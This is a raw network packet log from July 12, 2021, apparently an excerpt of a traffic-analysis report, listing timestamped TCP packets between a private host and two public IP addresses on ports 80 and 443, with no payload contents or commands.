Jul 12, 2021 10:29:49.720063925 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.720110893 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.720313072 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.720340014 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.720366001 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.720392942 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.720401049 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.720417976 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.720526934 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.720552921 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.720602036 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.720640898 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.720664978 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.720721960 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.720760107 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.720805883 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.720830917 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.720853090 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.720864058 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.720875025 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.720899105 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.720922947 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.720938921 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.720959902 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.720988035 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.721009016 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.721036911 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.721102953 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.721132040 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.721157074 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.721179962 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.721191883 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.721218109 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.721241951 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.721266031 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.721276999 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.721298933 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.721312046 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.721334934 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.721345901 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.721364021 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.721430063 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.721476078 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.721554041 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.721657038 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.721672058 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.721692085 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.721820116 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.721844912 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.721856117 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.721880913 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.721904993 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.721931934 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.721939087 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.721965075 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.721971035 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.721993923 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.722011089 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.722080946 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.722140074 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.722194910 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.722266912 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.722290039 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.722315073 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.722336054 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.722358942 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.722388983 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.722415924 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.722451925 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.722475052 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.722485065 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.722528934 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.722572088 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.722598076 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.722621918 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.722644091 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.722654104 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.722681046 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.722700119 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.722723961 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.722748995 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.722759008 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.722780943 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.722852945 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.722881079 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.722903967 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.722953081 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.722968102 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.722987890 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.723026991 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.723088980 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.723131895 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.723157883 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.723180056 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.723315954 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.723366976 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.723517895 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.783107996 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.789211988 CEST	443	49758	45.154.13.94	192.168.2.3
Jul 12, 2021 10:29:49.789299965 CEST	49758	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:49.790127993 CEST	49758	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:49.794470072 CEST	49758	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:50.018281937 CEST	443	49758	45.154.13.94	192.168.2.3
Jul 12, 2021 10:29:50.021912098 CEST	443	49758	45.154.13.94	192.168.2.3
Jul 12, 2021 10:29:50.023283005 CEST	443	49758	45.154.13.94	192.168.2.3
Jul 12, 2021 10:29:50.023304939 CEST	443	49758	45.154.13.94	192.168.2.3
Jul 12, 2021 10:29:50.023508072 CEST	49758	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:50.024183989 CEST	49758	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:50.024210930 CEST	49758	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:50.050774097 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:50.050869942 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:50.251353979 CEST	443	49758	45.154.13.94	192.168.2.3
Jul 12, 2021 10:29:50.252747059 CEST	49758	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:50.549331903 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:50.549549103 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.032740116 CEST	49762	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:51.260627985 CEST	443	49762	45.154.13.94	192.168.2.3
Jul 12, 2021 10:29:51.260760069 CEST	49762	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:51.274841070 CEST	49762	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:51.505942106 CEST	443	49762	45.154.13.94	192.168.2.3
Jul 12, 2021 10:29:51.505961895 CEST	443	49762	45.154.13.94	192.168.2.3
Jul 12, 2021 10:29:51.506053925 CEST	49762	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:51.515847921 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.515923977 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.640546083 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.662570000 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.662595034 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.662614107 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.662628889 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.662646055 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.662661076 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.662677050 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.662687063 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.662712097 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.662717104 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.662736893 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.662751913 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.662810087 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.662848949 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.662939072 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.662974119 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.662993908 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.663016081 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.663033962 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.663053989 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.663074970 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.663110018 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.663165092 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.663183928 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.663198948 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.663252115 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.663278103 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.663312912 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.663319111 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.663369894 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.663388968 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.663405895 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.663414955 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.663434029 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.663451910 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.663460970 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.663476944 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.663492918 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.663501978 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.663521051 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.663539886 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.663552046 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.663589001 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.663678885 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.663894892 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.663960934 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.663970947 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.663989067 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.664005041 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.664026022 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.664041042 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.664053917 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.664064884 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.664082050 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.664134979 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.664149046 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.664181948 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.664222956 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.664241076 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.664247990 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.664298058 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.664396048 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.664414883 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.664431095 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.664448023 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.664458036 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.664489985 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.664499044 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.664520025 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.664549112 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.664573908 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.664608955 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.664665937 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.664871931 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.664891005 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.664906979 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.664921999 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.664938927 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.664952993 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.664971113 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.664993048 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.664999008 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.665018082 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.665033102 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.665055037 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.665316105 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.665380001 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.665445089 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.665461063 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.665477037 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.665497065 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.665515900 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.665527105 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.665540934 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.665555954 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.665565014 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.665580988 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.665596962 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.665606022 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.665621042 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.665662050 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.665674925 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.665728092 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.665760994 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.665781021 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.665822029 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.665831089 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.665859938 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.665889025 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.665901899 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.665915966 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.665932894 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.665949106 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.665986061 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.665999889 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.666034937 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.666099072 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.666132927 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.666141987 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.666218996 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.666258097 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.666292906 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.666327000 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.666344881 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.666363955 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.666368961 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.666404009 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.666430950 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.666476011 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.666495085 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.666511059 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.666529894 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.666538954 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.666558027 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.666569948 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.666584969 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.666600943 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.666625023 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.666640043 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.666656971 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.666676998 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.666699886 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.666706085 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.666723967 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.666773081 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.667057037 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.667102098 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.667133093 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.667149067 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.667185068 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.667231083 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.667300940 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.667325020 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.667377949 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.667383909 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.667404890 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.667422056 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.667438030 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.667448997 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.667489052 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.667510986 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.667529106 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.667572021 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.667589903 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.667606115 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.667623043 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.667656898 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.667680979 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.667712927 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.667759895 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.667776108 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.667826891 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.667846918 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.667862892 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.667912960 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.667936087 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.667983055 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.668016911 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.668030977 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.668077946 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.668095112 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.668114901 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.668132067 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.668139935 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.668155909 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.668164968 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.668214083 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.668435097 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.668488026 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.668504000 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.668524981 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.668545008 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.668550968 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.668570042 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.668575048 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.668591022 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.668626070 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.668657064 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.668693066 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.668704033 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.668718100 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.668735981 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.668751955 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.668768883 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.668780088 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.668792963 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.668809891 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.668823957 CEST	49755	80	192.168.2.3	47.254.186.176
